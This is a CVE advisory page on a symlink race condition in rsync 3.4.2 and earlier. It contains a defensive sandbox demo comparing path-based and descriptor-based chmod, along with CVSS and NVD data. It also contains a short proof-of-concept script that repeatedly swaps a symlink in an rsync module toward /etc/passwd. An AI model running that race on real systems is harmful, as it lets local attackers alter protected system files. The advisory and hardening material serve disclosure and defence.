Security Vulnerability Report
CVE-2026-43619 CVSS 6.3 MEDIUM

CVE-2026-43619

Published: 2026-05-20 02:16:37
Last Modified: 2026-05-20 13:58:08

Description

Rsync version 3.4.2 and prior contain symlink race condition vulnerabilities in path-based system calls including chmod, lchown, utimes, rename, unlink, mkdir, symlink, mknod, link, rmdir, and lstat that allow local attackers to redirect operations to files outside the exported rsync module. Attackers with local filesystem access can exploit the timing window between path resolution and syscall execution by swapping symlinks to apply sender-supplied permissions, ownership, timestamps, or filenames to arbitrary files outside the intended module boundary on rsync daemons configured with 'use chroot = no'.
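Added example, not code from rsync, its fix, or this page: the window between path resolution and the syscall described above, shown for chmod in a constructed temp-directory sandbox, beside the descriptor-based pattern that closes it. The function names and the `between` hook (a deterministic stand-in for the concurrent symlink swap) are illustrative assumptions; Linux semantics are assumed.

```python
import os
import stat
import tempfile

def chmod_by_path(path, mode, between=lambda: None):
    """Racy: the check and the change each resolve the path separately."""
    if not stat.S_ISREG(os.lstat(path).st_mode):   # resolution 1: the check
        raise PermissionError(f"{path}: not a regular file")
    between()             # window between path resolution and the syscall
    os.chmod(path, mode)  # resolution 2: follows a symlink if one is there now

def chmod_by_fd(dir_fd, name, mode, between=lambda: None):
    """Hardened: O_NOFOLLOW refuses a symlink; check and change share one fd."""
    fd = os.open(name, os.O_RDONLY | os.O_NOFOLLOW | os.O_NONBLOCK, dir_fd=dir_fd)
    try:
        if not stat.S_ISREG(os.fstat(fd).st_mode):
            raise PermissionError(f"{name}: not a regular file")
        between()         # a swap here cannot redirect the change
        os.fchmod(fd, mode)
    finally:
        os.close(fd)

def demo():
    """Constructed sandbox: mode of the outside file after each variant."""
    modes = {}
    with tempfile.TemporaryDirectory() as root:
        module = os.path.join(root, "module")      # stands in for the module
        outside = os.path.join(root, "outside.txt")
        entry = os.path.join(module, "entry")
        os.mkdir(module)
        dir_fd = os.open(module, os.O_RDONLY | os.O_DIRECTORY)
        def swap():       # deterministic stand-in for the concurrent swap
            os.remove(entry)
            os.symlink(outside, entry)
        for variant in ("path", "fd"):
            if os.path.lexists(entry):
                os.remove(entry)
            for p in (outside, entry):             # fresh 0600 regular files
                open(p, "w").close()
                os.chmod(p, 0o600)
            if variant == "path":
                chmod_by_path(entry, 0o644, swap)
            else:
                chmod_by_fd(dir_fd, "entry", 0o644, swap)
            modes[variant] = stat.S_IMODE(os.stat(outside).st_mode)
        os.close(dir_fd)
    return modes

if __name__ == "__main__":
    print({k: oct(v) for k, v in demo().items()})
```

The descriptor pattern only pins the final path component; parent directories must be opened the same way, one component at a time relative to the module's directory descriptor, for the whole path to stay inside the module.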

CVSS Details

CVSS Score: 6.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Rsync <= 3.4.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import os
import time

# This script demonstrates the concept of the symlink race condition.
# It rapidly swaps a symlink between a safe target and a sensitive target.
#
# Usage:
# 1. Create a directory monitored by rsync.
# 2. Point 'link_path' inside that directory.
# 3. Run this script while triggering an rsync operation.

safe_path = "/tmp/safe_file.txt"
target_path = "/etc/passwd"  # Sensitive file to modify permissions/timestamps
link_path = "/tmp/rsync_module/exploit_link"

# Initialize the symlink
if os.path.exists(link_path):
    os.remove(link_path)
os.symlink(safe_path, link_path)

print("[*] Starting race condition attack...")
print(f"[*] Swapping {link_path} between {safe_path} and {target_path}")

try:
    while True:
        # Point to safe file (during rsync check)
        os.remove(link_path)
        os.symlink(safe_path, link_path)
        # Tiny delay to simulate timing window
        time.sleep(0.0001)
        # Point to target file (during rsync syscall execution)
        os.remove(link_path)
        os.symlink(target_path, link_path)
        time.sleep(0.0001)
except KeyboardInterrupt:
    print("\n[!] Stopping attack.")
    # Cleanup
    if os.path.islink(link_path):
        os.remove(link_path)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-43619", "sourceIdentifier": "[email protected]", "published": "2026-05-20T02:16:36.577", "lastModified": "2026-05-20T13:58:07.923", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Rsync version 3.4.2 and prior contain symlink race condition vulnerabilities in path-based system calls including chmod, lchown, utimes, rename, unlink, mkdir, symlink, mknod, link, rmdir, and lstat that allow local attackers to redirect operations to files outside the exported rsync module. Attackers with local filesystem access can exploit the timing window between path resolution and syscall execution by swapping symlinks to apply sender-supplied permissions, ownership, timestamps, or filenames to arbitrary files outside the intended module boundary on rsync daemons configured with 'use chroot = no'."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "HIGH", "attackRequirements": "PRESENT", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", 
"modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.0, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-59"}, {"lang": "en", "value": "CWE-367"}]}], "references": [{"url": "https://github.com/RsyncProject/rsync/releases/tag/v3.4.3", "source": "[email protected]"}, {"url": "https://github.com/RsyncProject/rsync/security/advisories/GHSA-4h9m-w5ff-j735", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/rsync-symlink-race-condition-via-path-based-syscalls", "source": "[email protected]"}]}}